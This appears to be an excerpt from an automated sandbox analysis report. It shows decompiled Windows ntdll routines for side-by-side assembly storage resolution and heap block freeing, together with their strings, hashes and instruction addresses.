                                                                                                                            • DbgPrintEx.1105(00000033,00000000,SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx,RtlpResolveAssemblyStorageMapEntry,00000040,?,00000000,00000000,?,00000000,00000002), ref: 6B24AC34
                                                                                                                            • RtlDeleteBoundaryDescriptor.1105(00000000,00000000,00000000,00000000,00100020,?,?,00000003,00000021,?,?,00000000,?,00000001,?,?), ref: 6B24AC4C
                                                                                                                            • ZwClose.1105(00000000,00000000,00000000,00000000,00100020,?,?,00000003,00000021,?,?,00000000,?,00000001,?,?), ref: 6B24AC5C
                                                                                                                            • RtlFreeHeap.1105(?,00000000,?,00000000,00000000,00000000,00100020,?,?,00000003,00000021,?,?,00000000,?,00000001), ref: 6B24AC72
                                                                                                                            Strings
                                                                                                                            • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 6B24AB0E
                                                                                                                            • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 6B24AC2C
                                                                                                                            • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 6B24AAC8
                                                                                                                            • @, xrefs: 6B24ABA3
                                                                                                                            • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 6B24AAA0
                                                                                                                            • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 6B24AC0A
                                                                                                                            • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 6B24ABF3
                                                                                                                            • RtlpResolveAssemblyStorageMapEntry, xrefs: 6B24AC27
                                                                                                                            • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 6B24AA1A
                                                                                                                            • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 6B24AA11
                                                                                                                            • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 6B24A8EC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Print$BoundaryCloseDeleteDescriptorFreeHeapmemcpy
                                                                                                                            • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                            • API String ID: 565419495-4009184096
                                                                                                                            • Opcode ID: 6a9999a8a88cb029c99198d459be63f8ee9749f1ffe35239955699982598277f
                                                                                                                            • Instruction ID: 985dcc0ec7eb2cbc8b133a3bfa27359cb09f6240866e7a061831d27e09c5fff8
                                                                                                                            • Opcode Fuzzy Hash: 6a9999a8a88cb029c99198d459be63f8ee9749f1ffe35239955699982598277f
                                                                                                                            • Instruction Fuzzy Hash: 320251F1D4422D9BDB25CB14CDC4BDAB7F8AB55704F4041EAE608A7281DB389E84CF69
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1FA309, Relevance: 49.7, APIs: 22, Strings: 6, Instructions: 687COMMONCrypto
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 72%
                                                                                                                            			E6B1FA309(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
				char _v8;
				signed short _v12;
				signed short _v16;
				signed int _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				signed int _v56;
				void* _v60;
				intOrPtr _v64;
				void* _v72;
				void* __ebx;
				void* __edi;
				void* __ebp;
				unsigned int _t246;
				signed char _t247;
				signed short _t249;
				unsigned int _t256;
				signed int _t262;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				intOrPtr _t270;
				signed int _t280;
				signed int _t286;
				signed int _t289;
				intOrPtr _t290;
				signed int _t291;
				signed int _t317;
				signed short _t320;
				intOrPtr _t327;
				signed int _t339;
				signed int _t344;
				signed int _t347;
				intOrPtr _t348;
				signed int _t350;
				signed int _t352;
				signed int _t353;
				signed int _t356;
				intOrPtr _t357;
				intOrPtr _t366;
				signed int _t367;
				signed int _t370;
				intOrPtr _t371;
				signed int _t372;
				signed int _t394;
				signed short _t402;
				intOrPtr _t404;
				intOrPtr _t415;
				signed int _t430;
				signed int _t433;
				signed int _t437;
				signed int _t445;
				signed short _t446;
				signed short _t449;
				signed short _t452;
				signed int _t455;
				signed int _t460;
				signed short* _t468;
				signed int _t480;
				signed int _t481;
				signed int _t483;
				intOrPtr _t484;
				signed int _t491;
				unsigned int _t506;
				unsigned int _t508;
				signed int _t513;
				signed int _t514;
				signed int _t521;
				signed short* _t533;
				signed int _t541;
				signed int _t543;
				signed int _t546;
				unsigned int _t551;
				signed int _t553;

				_t450 = __ecx;
				_t553 = __ecx;
				_t539 = __edx;
				_v28 = 0;
				_v40 = 0;
				if(( *(__ecx + 0xcc) ^  *0x6b2c8a68) != 0) {
					_push(_a4);
					_t513 = __edx;
					L11:
					_t246 = E6B1FA830(_t450, _t513);
					L7:
					return _t246;
				}
				if(_a8 != 0) {
					__eflags =  *(__edx + 2) & 0x00000008;
					if(( *(__edx + 2) & 0x00000008) != 0) {
						 *((intOrPtr*)(__ecx + 0x230)) =  *((intOrPtr*)(__ecx + 0x230)) - 1;
						_t430 = E6B1FDF24(__edx,  &_v12,  &_v16);
						__eflags = _t430;
						if(_t430 != 0) {
							_t157 = _t553 + 0x234;
							 *_t157 =  *(_t553 + 0x234) - _v16;
							__eflags =  *_t157;
						}
					}
					_t445 = _a4;
					_t514 = _t539;
					_v48 = _t539;
					L14:
					_t247 =  *((intOrPtr*)(_t539 + 6));
					__eflags = _t247;
					if(_t247 == 0) {
						_t541 = _t553;
					} else {
						_t541 = (_t539 & 0xffff0000) - ((_t247 & 0x000000ff) << 0x10) + 0x10000;
						__eflags = _t541;
					}
					_t249 = 7 + _t445 * 8 + _t514;
					_v12 = _t249;
					__eflags =  *_t249 - 3;
					if( *_t249 == 3) {
						_v16 = _t514 + _t445 * 8 + 8;
						E6B1D9373(_t553, _t514 + _t445 * 8 + 8);
						_t452 = _v16;
						_v28 =  *(_t452 + 0x10);
						 *((intOrPtr*)(_t541 + 0x30)) =  *((intOrPtr*)(_t541 + 0x30)) - 1;
						_v36 =  *(_t452 + 0x14);
						 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) - ( *(_t452 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) +  *(_t452 + 0x14);
						 *((intOrPtr*)(_t553 + 0x1f8)) =  *((intOrPtr*)(_t553 + 0x1f8)) - 1;
						_t256 =  *(_t452 + 0x14);
						__eflags = _t256 - 0x7f000;
						if(_t256 >= 0x7f000) {
							_t142 = _t553 + 0x1ec;
							 *_t142 =  *(_t553 + 0x1ec) - _t256;
							__eflags =  *_t142;
							_t256 =  *(_t452 + 0x14);
						}
						_t513 = _v48;
						_t445 = _t445 + (_t256 >> 3) + 0x20;
						_a4 = _t445;
						_v40 = 1;
					} else {
						_t27 =  &_v36;
						 *_t27 = _v36 & 0x00000000;
						__eflags =  *_t27;
					}
					__eflags =  *((intOrPtr*)(_t553 + 0x54)) -  *((intOrPtr*)(_t513 + 4));
					if( *((intOrPtr*)(_t553 + 0x54)) ==  *((intOrPtr*)(_t513 + 4))) {
						_v44 = _t513;
						_t262 = E6B1DA9EF(_t541, _t513);
						__eflags = _a8;
						_v32 = _t262;
						if(_a8 != 0) {
							__eflags = _t262;
							if(_t262 == 0) {
								goto L19;
							}
						}
						__eflags =  *0x6b2c8748 - 1;
						if( *0x6b2c8748 >= 1) {
							__eflags = _t262;
							if(_t262 == 0) {
								_t415 =  *[fs:0x30];
								__eflags =  *(_t415 + 0xc);
								if( *(_t415 + 0xc) == 0) {
									_push("HEAP: ");
									E6B1DB150();
								} else {
									E6B1DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push("(UCRBlock != NULL)");
								E6B1DB150();
								__eflags =  *0x6b2c7bc8;
								if( *0x6b2c7bc8 == 0) {
									__eflags = 1;
									E6B292073(_t445, 1, _t541, 1);
								}
								_t513 = _v48;
								_t445 = _a4;
							}
						}
						_t350 = _v40;
						_t480 = _t445 << 3;
						_v20 = _t480;
						_t481 = _t480 + _t513;
						_v24 = _t481;
						__eflags = _t350;
						if(_t350 == 0) {
							_t481 = _t481 + 0xfffffff0;
							__eflags = _t481;
						}
						_t483 = (_t481 & 0xfffff000) - _v44;
						__eflags = _t483;
						_v52 = _t483;
						if(_t483 == 0) {
							__eflags =  *0x6b2c8748 - 1;
							if( *0x6b2c8748 < 1) {
								goto L9;
							}
							__eflags = _t350;
							goto L146;
						} else {
							_t352 = E6B20174B( &_v44,  &_v52, 0x4000);
							__eflags = _t352;
							if(_t352 < 0) {
								goto L94;
							}
							_t353 = E6B1F7D50();
							_t447 = 0x7ffe0380;
							__eflags = _t353;
							if(_t353 != 0) {
								_t356 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t356 = 0x7ffe0380;
							}
							__eflags =  *_t356;
							if( *_t356 != 0) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0x240) & 0x00000001;
								if(( *(_t357 + 0x240) & 0x00000001) != 0) {
									E6B2914FB(_t553, _v44, _v52, 5);
								}
							}
							_t358 = _v32;
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t484 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t484 - 0x7f000;
							if(_t484 >= 0x7f000) {
								_t90 = _t553 + 0x1ec;
								 *_t90 =  *(_t553 + 0x1ec) - _t484;
								__eflags =  *_t90;
							}
							E6B1D9373(_t553, _t358);
							_t486 = _v32;
							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
							E6B1D9819(_t486);
							 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) + (_v52 >> 0xc);
							 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) - _v52;
							_t366 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t366 - 0x7f000;
							if(_t366 >= 0x7f000) {
								_t104 = _t553 + 0x1ec;
								 *_t104 =  *(_t553 + 0x1ec) + _t366;
								__eflags =  *_t104;
							}
							__eflags = _v40;
							if(_v40 == 0) {
								_t533 = _v52 + _v44;
								_v32 = _t533;
								_t533[2] =  *((intOrPtr*)(_t553 + 0x54));
								__eflags = _v24 - _v52 + _v44;
								if(_v24 == _v52 + _v44) {
									__eflags =  *(_t553 + 0x4c);
									if( *(_t553 + 0x4c) != 0) {
										_t533[1] = _t533[1] ^ _t533[0] ^  *_t533;
										 *_t533 =  *_t533 ^  *(_t553 + 0x50);
									}
								} else {
									_t449 = 0;
									_t533[3] = 0;
									_t533[1] = 0;
									_t394 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
									_t491 = _t394;
									 *_t533 = _t394;
									__eflags =  *0x6b2c8748 - 1;
									if( *0x6b2c8748 >= 1) {
										__eflags = _t491 - 1;
										if(_t491 <= 1) {
											_t404 =  *[fs:0x30];
											__eflags =  *(_t404 + 0xc);
											if( *(_t404 + 0xc) == 0) {
												_push("HEAP: ");
												E6B1DB150();
											} else {
												E6B1DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
											}
											_push("((LONG)FreeEntry->Size > 1)");
											E6B1DB150();
											_pop(_t491);
											__eflags =  *0x6b2c7bc8 - _t449;
											if( *0x6b2c7bc8 == _t449) {
												__eflags = 0;
												_t491 = 1;
												E6B292073(_t449, 1, _t541, 0);
											}
											_t533 = _v32;
										}
									}
									_t533[1] = _t449;
									__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
									if( *((intOrPtr*)(_t541 + 0x18)) != _t541) {
										_t402 = (_t533 - _t541 >> 0x10) + 1;
										_v16 = _t402;
										__eflags = _t402 - 0xfe;
										if(_t402 >= 0xfe) {
											_push(_t491);
											_push(_t449);
											E6B29A80D( *((intOrPtr*)(_t541 + 0x18)), 3, _t533, _t541);
											_t533 = _v48;
											_t402 = _v32;
										}
										_t449 = _t402;
									}
									_t533[3] = _t449;
									E6B1FA830(_t553, _t533,  *_t533 & 0x0000ffff);
									_t447 = 0x7ffe0380;
								}
							}
							_t367 = E6B1F7D50();
							__eflags = _t367;
							if(_t367 != 0) {
								_t370 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t370 = _t447;
							}
							__eflags =  *_t370;
							if( *_t370 != 0) {
								_t371 =  *[fs:0x30];
								__eflags =  *(_t371 + 0x240) & 1;
								if(( *(_t371 + 0x240) & 1) != 0) {
									__eflags = E6B1F7D50();
									if(__eflags != 0) {
										_t447 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									}
									E6B291411(_t447, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _v40, _v36,  *_t447 & 0x000000ff);
								}
							}
							_t372 = E6B1F7D50();
							_t546 = 0x7ffe038a;
							_t446 = 0x230;
							__eflags = _t372;
							if(_t372 != 0) {
								_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t246 = 0x7ffe038a;
							}
							__eflags =  *_t246;
							if( *_t246 == 0) {
								goto L7;
							} else {
								__eflags = E6B1F7D50();
								if(__eflags != 0) {
									_t546 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t446;
									__eflags = _t546;
								}
								_push( *_t546 & 0x000000ff);
								_push(_v36);
								_push(_v40);
								goto L120;
							}
						}
					} else {
						L19:
						_t31 = _t513 + 0x101f; // 0x101f
						_t455 = _t31 & 0xfffff000;
						_t32 = _t513 + 0x28; // 0x28
						_v44 = _t455;
						__eflags = _t455 - _t32;
						if(_t455 == _t32) {
							_t455 = _t455 + 0x1000;
							_v44 = _t455;
						}
						_t265 = _t445 << 3;
						_v24 = _t265;
						_t266 = _t265 + _t513;
						__eflags = _v40;
						_v20 = _t266;
						if(_v40 == 0) {
							_t266 = _t266 + 0xfffffff0;
							__eflags = _t266;
						}
						_t267 = _t266 & 0xfffff000;
						_v52 = _t267;
						__eflags = _t267 - _t455;
						if(_t267 < _t455) {
							__eflags =  *0x6b2c8748 - 1;
							if( *0x6b2c8748 < 1) {
								L9:
								_t450 = _t553;
								L10:
								_push(_t445);
								goto L11;
							}
							__eflags = _v40;
							L146:
							if(__eflags == 0) {
								goto L9;
							}
							_t270 =  *[fs:0x30];
							__eflags =  *(_t270 + 0xc);
							if( *(_t270 + 0xc) == 0) {
								_push("HEAP: ");
								E6B1DB150();
							} else {
								E6B1DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("(!TrailingUCR)");
							E6B1DB150();
							__eflags =  *0x6b2c7bc8;
							if( *0x6b2c7bc8 == 0) {
								__eflags = 0;
								E6B292073(_t445, 1, _t541, 0);
							}
							L152:
							_t445 = _a4;
							L153:
							_t513 = _v48;
							goto L9;
						}
						_v32 = _t267;
						_t280 = _t267 - _t455;
						_v32 = _v32 - _t455;
						__eflags = _a8;
						_t460 = _v32;
						_v52 = _t460;
						if(_a8 != 0) {
							L27:
							__eflags = _t280;
							if(_t280 == 0) {
								L33:
								_t446 = 0;
								__eflags = _v40;
								if(_v40 == 0) {
									_t468 = _v44 + _v52;
									_v36 = _t468;
									_t468[2] =  *((intOrPtr*)(_t553 + 0x54));
									__eflags = _v20 - _v52 + _v44;
									if(_v20 == _v52 + _v44) {
										__eflags =  *(_t553 + 0x4c);
										if( *(_t553 + 0x4c) != 0) {
											_t468[1] = _t468[1] ^ _t468[0] ^  *_t468;
											 *_t468 =  *_t468 ^  *(_t553 + 0x50);
										}
									} else {
										_t468[3] = 0;
										_t468[1] = 0;
										_t317 = _v24 - _v52 - _v44 + _t513 >> 0x00000003 & 0x0000ffff;
										_t521 = _t317;
										 *_t468 = _t317;
										__eflags =  *0x6b2c8748 - 1;
										if( *0x6b2c8748 >= 1) {
											__eflags = _t521 - 1;
											if(_t521 <= 1) {
												_t327 =  *[fs:0x30];
												__eflags =  *(_t327 + 0xc);
												if( *(_t327 + 0xc) == 0) {
													_push("HEAP: ");
													E6B1DB150();
												} else {
													E6B1DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
												}
												_push("(LONG)FreeEntry->Size > 1");
												E6B1DB150();
												__eflags =  *0x6b2c7bc8 - _t446;
												if( *0x6b2c7bc8 == _t446) {
													__eflags = 1;
													E6B292073(_t446, 1, _t541, 1);
												}
												_t468 = _v36;
											}
										}
										_t468[1] = _t446;
										_t522 =  *((intOrPtr*)(_t541 + 0x18));
										__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
										if( *((intOrPtr*)(_t541 + 0x18)) == _t541) {
											_t320 = _t446;
										} else {
											_t320 = (_t468 - _t541 >> 0x10) + 1;
											_v12 = _t320;
											__eflags = _t320 - 0xfe;
											if(_t320 >= 0xfe) {
												_push(_t468);
												_push(_t446);
												E6B29A80D(_t522, 3, _t468, _t541);
												_t468 = _v52;
												_t320 = _v28;
											}
										}
										_t468[3] = _t320;
										E6B1FA830(_t553, _t468,  *_t468 & 0x0000ffff);
									}
								}
								E6B1FB73D(_t553, _t541, _v44 + 0xffffffe8, _v52, _v48,  &_v8);
								E6B1FA830(_t553, _v64, _v24);
								_t286 = E6B1F7D50();
								_t542 = 0x7ffe0380;
								__eflags = _t286;
								if(_t286 != 0) {
									_t289 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								} else {
									_t289 = 0x7ffe0380;
								}
								__eflags =  *_t289;
								if( *_t289 != 0) {
									_t290 =  *[fs:0x30];
									__eflags =  *(_t290 + 0x240) & 1;
									if(( *(_t290 + 0x240) & 1) != 0) {
										__eflags = E6B1F7D50();
										if(__eflags != 0) {
											_t542 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										}
										E6B291411(_t446, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _t446, _t446,  *_t542 & 0x000000ff);
									}
								}
								_t291 = E6B1F7D50();
								_t543 = 0x7ffe038a;
								__eflags = _t291;
								if(_t291 != 0) {
									_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
								} else {
									_t246 = 0x7ffe038a;
								}
								__eflags =  *_t246;
								if( *_t246 != 0) {
									__eflags = E6B1F7D50();
									if(__eflags != 0) {
										_t543 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
										__eflags = _t543;
									}
									_push( *_t543 & 0x000000ff);
									_push(_t446);
									_push(_t446);
									L120:
									_push( *(_t553 + 0x74) << 3);
									_push(_v52);
									_t246 = E6B291411(_t446, _t553, _v44, __eflags);
								}
								goto L7;
							}
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t339 = E6B20174B( &_v44,  &_v52, 0x4000);
							__eflags = _t339;
							if(_t339 < 0) {
								L94:
								 *((intOrPtr*)(_t553 + 0x210)) =  *((intOrPtr*)(_t553 + 0x210)) + 1;
								__eflags = _v40;
								if(_v40 == 0) {
									goto L153;
								}
								E6B1FB73D(_t553, _t541, _v28 + 0xffffffe8, _v36, _v48,  &_a4);
								goto L152;
							}
							_t344 = E6B1F7D50();
							__eflags = _t344;
							if(_t344 != 0) {
								_t347 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t347 = 0x7ffe0380;
							}
							__eflags =  *_t347;
							if( *_t347 != 0) {
								_t348 =  *[fs:0x30];
								__eflags =  *(_t348 + 0x240) & 1;
								if(( *(_t348 + 0x240) & 1) != 0) {
									E6B2914FB(_t553, _v44, _v52, 6);
								}
							}
							_t513 = _v48;
							goto L33;
						}
						__eflags =  *_v12 - 3;
						_t513 = _v48;
						if( *_v12 == 3) {
							goto L27;
						}
						__eflags = _t460;
						if(_t460 == 0) {
							goto L9;
						}
						__eflags = _t460 -  *((intOrPtr*)(_t553 + 0x6c));
						if(_t460 <  *((intOrPtr*)(_t553 + 0x6c))) {
							goto L9;
						}
						goto L27;
					}
				}
				_t445 = _a4;
				if(_t445 <  *((intOrPtr*)(__ecx + 0x6c))) {
					_t513 = __edx;
					goto L10;
				}
				_t433 =  *((intOrPtr*)(__ecx + 0x74)) + _t445;
				_v20 = _t433;
				if(_t433 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1e8) >>  *((intOrPtr*)(__ecx + 0x240)) + 3) {
					_t513 = _t539;
					goto L9;
				} else {
					_t437 = E6B1F99BF(__ecx, __edx,  &_a4, 0);
					_t445 = _a4;
					_t514 = _t437;
					_v56 = _t514;
					if(_t445 - 0x201 > 0xfbff) {
						goto L14;
					} else {
						E6B1FA830(__ecx, _t514, _t445);
						_t506 =  *(_t553 + 0x238);
						_t551 =  *((intOrPtr*)(_t553 + 0x1e8)) - ( *(_t553 + 0x74) << 3);
						_t246 = _t506 >> 4;
						if(_t551 < _t506 - _t246) {
							_t508 =  *(_t553 + 0x23c);
							_t246 = _t508 >> 2;
							__eflags = _t551 - _t508 - _t246;
							if(_t551 > _t508 - _t246) {
								_t246 = E6B20ABD8(_t553);
								 *(_t553 + 0x23c) = _t551;
								 *(_t553 + 0x238) = _t551;
							}
						}
						goto L7;
					}
				}
			}



















































































                                                                                                                            0x6b1fa309
                                                                                                                            0x6b1fa316
                                                                                                                            0x6b1fa319
                                                                                                                            0x6b1fa31d
                                                                                                                            0x6b1fa32d
                                                                                                                            0x6b1fa331
                                                                                                                            0x6b241e0d
                                                                                                                            0x6b241e10
                                                                                                                            0x6b1fa3cb
                                                                                                                            0x6b1fa3cb
                                                                                                                            0x6b1fa3bd
                                                                                                                            0x6b1fa3c3
                                                                                                                            0x6b1fa3c3
                                                                                                                            0x6b1fa33a
                                                                                                                            0x6b241e17
                                                                                                                            0x6b241e1b
                                                                                                                            0x6b241e1d
                                                                                                                            0x6b241e2f
                                                                                                                            0x6b241e34
                                                                                                                            0x6b241e36
                                                                                                                            0x6b241e3c
                                                                                                                            0x6b241e3c
                                                                                                                            0x6b241e3c
                                                                                                                            0x6b241e3c
                                                                                                                            0x6b241e36
                                                                                                                            0x6b241e42
                                                                                                                            0x6b241e45
                                                                                                                            0x6b241e47
                                                                                                                            0x6b1fa3f8
                                                                                                                            0x6b1fa3f8
                                                                                                                            0x6b1fa3fb
                                                                                                                            0x6b1fa3fd
                                                                                                                            0x6b241e50
                                                                                                                            0x6b1fa403
                                                                                                                            0x6b1fa411
                                                                                                                            0x6b1fa411
                                                                                                                            0x6b1fa411
                                                                                                                            0x6b1fa41e
                                                                                                                            0x6b1fa420
                                                                                                                            0x6b1fa424
                                                                                                                            0x6b1fa427
                                                                                                                            0x6b1fa7c9
                                                                                                                            0x6b1fa7cd
                                                                                                                            0x6b1fa7d2
                                                                                                                            0x6b1fa7d9
                                                                                                                            0x6b1fa7e0
                                                                                                                            0x6b1fa7e3
                                                                                                                            0x6b1fa7ed
                                                                                                                            0x6b1fa7f3
                                                                                                                            0x6b1fa7f9
                                                                                                                            0x6b1fa7ff
                                                                                                                            0x6b1fa802
                                                                                                                            0x6b1fa807
                                                                                                                            0x6b1fa809
                                                                                                                            0x6b1fa809
                                                                                                                            0x6b1fa809
                                                                                                                            0x6b1fa80f
                                                                                                                            0x6b1fa80f
                                                                                                                            0x6b1fa812
                                                                                                                            0x6b1fa81c
                                                                                                                            0x6b1fa821
                                                                                                                            0x6b1fa824
                                                                                                                            0x6b1fa42d
                                                                                                                            0x6b1fa42d
                                                                                                                            0x6b1fa42d
                                                                                                                            0x6b1fa42d
                                                                                                                            0x6b1fa42d
                                                                                                                            0x6b1fa436
                                                                                                                            0x6b1fa43a
                                                                                                                            0x6b1fa609
                                                                                                                            0x6b1fa60d
                                                                                                                            0x6b1fa612
                                                                                                                            0x6b1fa616
                                                                                                                            0x6b1fa61a
                                                                                                                            0x6b241e57
                                                                                                                            0x6b241e59
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b241e5f
                                                                                                                            0x6b1fa620
                                                                                                                            0x6b1fa627
                                                                                                                            0x6b241e64
                                                                                                                            0x6b241e66
                                                                                                                            0x6b241e6c
                                                                                                                            0x6b241e72
                                                                                                                            0x6b241e76
                                                                                                                            0x6b241e95
                                                                                                                            0x6b241e9a
                                                                                                                            0x6b241e78
                                                                                                                            0x6b241e8d
                                                                                                                            0x6b241e92
                                                                                                                            0x6b241ea0
                                                                                                                            0x6b241ea5
                                                                                                                            0x6b241eaa
                                                                                                                            0x6b241eb2
                                                                                                                            0x6b241eb6
                                                                                                                            0x6b241eb9
                                                                                                                            0x6b241eb9
                                                                                                                            0x6b241ebe
                                                                                                                            0x6b241ec2
                                                                                                                            0x6b241ec2
                                                                                                                            0x6b241e66
                                                                                                                            0x6b1fa62d
                                                                                                                            0x6b1fa633
                                                                                                                            0x6b1fa636
                                                                                                                            0x6b1fa63a
                                                                                                                            0x6b1fa63c
                                                                                                                            0x6b1fa640
                                                                                                                            0x6b1fa642
                                                                                                                            0x6b1fa644
                                                                                                                            0x6b1fa644
                                                                                                                            0x6b1fa644
                                                                                                                            0x6b1fa64d
                                                                                                                            0x6b1fa64d
                                                                                                                            0x6b1fa651
                                                                                                                            0x6b1fa655
                                                                                                                            0x6b241eca
                                                                                                                            0x6b241ed1
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b241ed7
                                                                                                                            0x00000000
                                                                                                                            0x6b1fa65b
                                                                                                                            0x6b1fa669
                                                                                                                            0x6b1fa66e
                                                                                                                            0x6b1fa670
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1fa676
                                                                                                                            0x6b1fa67b
                                                                                                                            0x6b1fa680
                                                                                                                            0x6b1fa682
                                                                                                                            0x6b241f1a
                                                                                                                            0x6b1fa688
                                                                                                                            0x6b1fa688
                                                                                                                            0x6b1fa688
                                                                                                                            0x6b1fa68a
                                                                                                                            0x6b1fa68d
                                                                                                                            0x6b241f24
                                                                                                                            0x6b241f2a
                                                                                                                            0x6b241f31
                                                                                                                            0x6b241f43
                                                                                                                            0x6b241f43
                                                                                                                            0x6b241f31
                                                                                                                            0x6b1fa693
                                                                                                                            0x6b1fa697
                                                                                                                            0x6b1fa69d
                                                                                                                            0x6b1fa6a0
                                                                                                                            0x6b1fa6a6
                                                                                                                            0x6b1fa6a8
                                                                                                                            0x6b1fa6a8
                                                                                                                            0x6b1fa6a8
                                                                                                                            0x6b1fa6a8
                                                                                                                            0x6b1fa6b2
                                                                                                                            0x6b1fa6b7
                                                                                                                            0x6b1fa6c1
                                                                                                                            0x6b1fa6c6
                                                                                                                            0x6b1fa6d2
                                                                                                                            0x6b1fa6d9
                                                                                                                            0x6b1fa6e3
                                                                                                                            0x6b1fa6e6
                                                                                                                            0x6b1fa6eb
                                                                                                                            0x6b1fa6ed
                                                                                                                            0x6b1fa6ed
                                                                                                                            0x6b1fa6ed
                                                                                                                            0x6b1fa6ed
                                                                                                                            0x6b1fa6f3
                                                                                                                            0x6b1fa6f8
                                                                                                                            0x6b1fa702
                                                                                                                            0x6b1fa70a
                                                                                                                            0x6b1fa70e
                                                                                                                            0x6b1fa71a
                                                                                                                            0x6b1fa71e
                                                                                                                            0x6b241fcb
                                                                                                                            0x6b241fcf
                                                                                                                            0x6b241fdd
                                                                                                                            0x6b241fe3
                                                                                                                            0x6b241fe3
                                                                                                                            0x6b1fa724
                                                                                                                            0x6b1fa728
                                                                                                                            0x6b1fa72a
                                                                                                                            0x6b1fa72d
                                                                                                                            0x6b1fa737
                                                                                                                            0x6b1fa73a
                                                                                                                            0x6b1fa73c
                                                                                                                            0x6b1fa742
